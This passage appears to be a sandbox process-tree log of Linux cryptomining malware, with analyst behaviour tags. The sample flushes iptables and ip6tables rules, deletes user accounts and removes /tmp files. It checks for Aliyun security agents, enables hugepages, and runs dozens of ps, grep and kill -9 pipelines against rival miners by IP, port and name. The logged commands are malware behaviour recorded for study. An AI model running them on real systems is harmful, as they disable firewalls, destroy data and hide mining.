      PID:1698
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1699
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1700
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1701
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1702
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1703
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1704
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1705
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1706
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1707
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:1708
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:1709
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:1710
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:1711
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:1712
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1713
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:1714
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:1716
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1715
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:1717
- /sbin/sysctl
  sysctl -w "vm.nr_hugepages=128"
  2⤵
  PID:1718
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:1720
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1723
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1722
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1721
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1728
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1727
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1726
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:1725
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1734
- /bin/grep
  grep -v -
  2⤵
  PID:1733
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1732
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1731
- /bin/grep
  grep :443
  2⤵
  PID:1730
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1740
- /bin/grep
  grep -v -
  2⤵
  PID:1739
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1738
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1737
- /bin/grep
  grep :23
  2⤵
  PID:1736
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1746
- /bin/grep
  grep -v -
  2⤵
  PID:1745
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1744
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1743
- /bin/grep
  grep :443
  2⤵
  PID:1742
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1752
- /bin/grep
  grep -v -
  2⤵
  PID:1751
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1750
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1749
- /bin/grep
  grep :143
  2⤵
  PID:1748
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1758
- /bin/grep
  grep -v -
  2⤵
  PID:1757
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1756
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1755
- /bin/grep
  grep :2222
  2⤵
  PID:1754
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1764
- /bin/grep
  grep -v -
  2⤵
  PID:1763
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1762
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1761
- /bin/grep
  grep :3333
  2⤵
  PID:1760
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1770
- /bin/grep
  grep -v -
  2⤵
  PID:1769
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1768
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1767
- /bin/grep
  grep :3389
  2⤵
  PID:1766
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1776
- /bin/grep
  grep -v -
  2⤵
  PID:1775
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1774
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1773
- /bin/grep
  grep :5555
  2⤵
  PID:1772
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1782
- /bin/grep
  grep -v -
  2⤵
  PID:1781
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1780
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1779
- /bin/grep
  grep :6666
  2⤵
  PID:1778
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1788
- /bin/grep
  grep -v -
  2⤵
  PID:1787
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1786
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1785
- /bin/grep
  grep :6665
  2⤵
  PID:1784
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1794
- /bin/grep
  grep -v -
  2⤵
  PID:1793
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1792
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1791
- /bin/grep
  grep :6667
  2⤵
  PID:1790
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1800
- /bin/grep
  grep -v -
  2⤵
  PID:1799
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1798
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1797
- /bin/grep
  grep :7777
  2⤵
  PID:1796
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1806
- /bin/grep
  grep -v -
  2⤵
  PID:1805
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1804
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1803
- /bin/grep
  grep :8444
  2⤵
  PID:1802
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1812
- /bin/grep
  grep -v -
  2⤵
  PID:1811
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1810
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1809
- /bin/grep
  grep :3347
  2⤵
  PID:1808
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1817
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1816
- /bin/grep
  grep :3333
  2⤵
  PID:1815
- /bin/grep
  grep -v grep
  2⤵
  PID:1814
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1813
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1822
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1821
- /bin/grep
  grep :5555
  2⤵
  PID:1820
- /bin/grep
  grep -v grep
  2⤵
  PID:1819
- /bin/ps
  ps aux
  2⤵
  PID:1818
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1827
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1826
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1825
- /bin/grep
  grep -v grep
  2⤵
  PID:1824
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1823
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1832
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1831
- /bin/grep
  grep log_
  2⤵
  PID:1830
- /bin/grep
  grep -v grep
  2⤵
  PID:1829
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1828
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1837
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1836
- /bin/grep
  grep systemten
  2⤵
  PID:1835
- /bin/grep
  grep -v grep
  2⤵
  PID:1834
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1833
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1842
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:1843
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:1843
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:1843
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:1843
- - /sbin/kill
    kill -9 14
    3⤵
    PID:1843
- - /bin/kill
    kill -9 14
    3⤵
    PID:1843
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1841
- /bin/grep
  grep netns
  2⤵
  PID:1840
- /bin/grep
  grep -v grep
  2⤵
  PID:1839
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1838
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1848
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1847
- /bin/grep
  grep voltuned
  2⤵
  PID:1846
- /bin/grep
  grep -v grep
  2⤵
  PID:1845
- /bin/ps
  ps aux
  2⤵
  PID:1844
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1853
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1852
- /bin/grep
  grep darwin
  2⤵
  PID:1851
- /bin/grep
  grep -v grep
  2⤵
  PID:1850
- /bin/ps
  ps aux
  2⤵
  PID:1849
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1858
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1857
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1856
- /bin/grep
  grep -v grep
  2⤵
  PID:1855
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1854
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1863
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1862
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1861
- /bin/grep
  grep -v grep
  2⤵
  PID:1860
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1859
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1868
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1867
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1866
- /bin/grep
  grep -v grep
  2⤵
  PID:1865
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1864
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1873
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1872
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1871
- /bin/grep
  grep -v grep
  2⤵
  PID:1870
- /bin/ps
  ps aux
  2⤵
  PID:1869
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1878
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1877
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1876
- /bin/grep
  grep -v grep
  2⤵
  PID:1875
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1874
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1883
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1882
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1881
- /bin/grep
  grep -v grep
  2⤵
  PID:1880
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1879
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1888
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1887
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1886
- /bin/grep
  grep -v grep
  2⤵
  PID:1885
- /bin/ps
  ps aux
  2⤵
  PID:1884
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1893
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1892
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1891
- /bin/grep
  grep -v grep
  2⤵
  PID:1890
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1889
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1898
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1897
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1896
- /bin/grep
  grep -v grep
  2⤵
  PID:1895
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1894
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1903
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1902
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1901
- /bin/grep
  grep -v grep
  2⤵
  PID:1900
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1899
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1908
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1907
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1906
- /bin/grep
  grep -v grep
  2⤵
  PID:1905
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1904
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1913
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1912
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1911
- /bin/grep
  grep -v grep
  2⤵
  PID:1910
- /bin/ps
  ps aux
  2⤵
  PID:1909
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1918
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1917
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1916
- /bin/grep
  grep -v grep
  2⤵
  PID:1915
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1914
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1923
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1922
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:1921
- /bin/grep
  grep -v grep
  2⤵
  PID:1920
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1919
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1928
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1927
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:1926
- /bin/grep
  grep -v grep
  2⤵
  PID:1925
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1924
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1933
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1932
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1931
- /bin/grep
  grep -v grep
  2⤵
  PID:1930
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1929
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1938
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1937
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1936
- /bin/grep
  grep -v grep
  2⤵
  PID:1935
- /bin/ps
  ps aux
  2⤵
  PID:1934
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1943
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1942
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1941
- /bin/grep
  grep -v grep
  2⤵
  PID:1940
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1939
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1948
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1947
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1946
- /bin/grep
  grep -v grep
  2⤵
  PID:1945
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1944
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1953
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1952
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1951
- /bin/grep
  grep -v grep
  2⤵
  PID:1950
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1949
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1958
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1957
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1956
- /bin/grep
  grep -v grep
  2⤵
  PID:1955
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1954
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1963
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1962
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1961
- /bin/grep
  grep -v grep
  2⤵
  PID:1960
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1959
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1968
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1967
- /bin/grep
  grep svc
  2⤵
  PID:1966
- /bin/grep
  grep -v grep
  2⤵
  PID:1965
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1964
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1973
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1972
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1971
- /bin/grep
  grep -v grep
  2⤵
  PID:1970
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1969
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1978
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1977
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1976
- /bin/grep
  grep -v grep
  2⤵
  PID:1975
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1974
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1983
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1982
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1981
- /bin/grep
  grep -v grep
  2⤵
  PID:1980
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1979
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1988
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1987
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1986
- /bin/grep
  grep -v grep
  2⤵
  PID:1985
- /bin/ps
  ps aux
  2⤵
  PID:1984
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1993
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1992
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1991
- /bin/grep
  grep -v grep
  2⤵
  PID:1990
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1989
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1998
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1997
- /bin/grep
  grep HiPxCJRS
  2⤵
  - System Network Configuration Discovery
  PID:1996
- /bin/grep
  grep -v grep
  2⤵
  PID:1995
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1994
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2003
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2002
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:2001
- /bin/grep
  grep -v grep
  2⤵
  PID:2000
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1999
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2008
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2007
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:2006
- /bin/grep
  grep -v grep
  2⤵
  PID:2005
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2004
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2013
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2012
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:2011
- /bin/grep
  grep -v grep
  2⤵
  PID:2010
- /bin/ps
  ps aux
  2⤵
  PID:2009
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2018
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2017
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:2016
- /bin/grep
  grep -v grep
  2⤵
  PID:2015
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2014
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2023
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2022
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:2021
- /bin/grep
  grep -v grep
  2⤵
  PID:2020
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2019
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2028
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2027
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:2026
- /bin/grep
  grep -v grep
  2⤵
  PID:2025
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2024
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2032
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:2031
- /bin/grep
  grep -v grep
  2⤵
  PID:2030
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2029
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2037
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2036
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:2035
- /bin/grep
  grep -v grep
  2⤵
  PID:2034
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2033
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2042
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2041
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:2040
- /bin/grep
  grep -v grep
  2⤵
  PID:2039
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2038
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2047
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2046
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:2045
- /bin/grep
  grep -v grep
  2⤵
  PID:2044
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2043
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2052
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2051
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:2050
- /bin/grep
  grep -v grep
  2⤵
  PID:2049
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2048
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2057
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2056
- /bin/grep
  grep nqscheduler
  2⤵
  PID:2055
- /bin/grep
  grep -v grep
  2⤵
  PID:2054
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2053
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2062
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2061
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:2060
- /bin/grep
  grep -v grep
  2⤵
  PID:2059
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2058
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2068
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:2067
- /bin/grep
  grep "]"
  2⤵
  PID:2066
- /bin/grep
  grep -v aux
  2⤵
  PID:2065
- /bin/grep
  grep -v grep
  2⤵
  PID:2064
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2063
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2073
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2072
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:2071
- /bin/grep
  grep -v grep
  2⤵
  PID:2070
- /bin/ps
  ps aux
  2⤵
  PID:2069
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2078
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2077
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:2076
- /bin/grep
  grep -v grep
  2⤵
  PID:2075
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2074
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2083
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2082
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:2081
- /bin/grep
  grep -v grep
  2⤵
  PID:2080
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2079
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2090
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:2089
- /bin/grep
  grep -v _
  2⤵
  PID:2088
- /bin/grep
  grep -v -
  2⤵
  PID:2087
- /bin/grep
  grep -v /
  2⤵
  PID:2086
- /bin/grep
  grep -v grep
  2⤵
  PID:2085
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2084
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2095
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2094
- /bin/grep
  grep "\\[^"
  2⤵
  PID:2093
- /bin/grep
  grep -v grep
  2⤵
  PID:2092
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2091
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2100
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2099
- /bin/grep
  grep rsync
  2⤵
  PID:2098
- /bin/grep
  grep -v grep
  2⤵
  PID:2097
- /bin/ps
  ps aux
  2⤵
  PID:2096
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2105
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2104
- /bin/grep
  grep watchd0g
  2⤵
  PID:2103
- /bin/grep
  grep -v grep
  2⤵
  PID:2102
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2101
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2110
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2109
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2108
- /bin/grep
  grep -v grep
  2⤵
  PID:2107
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2108
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2108
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2108
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2108
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2108
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
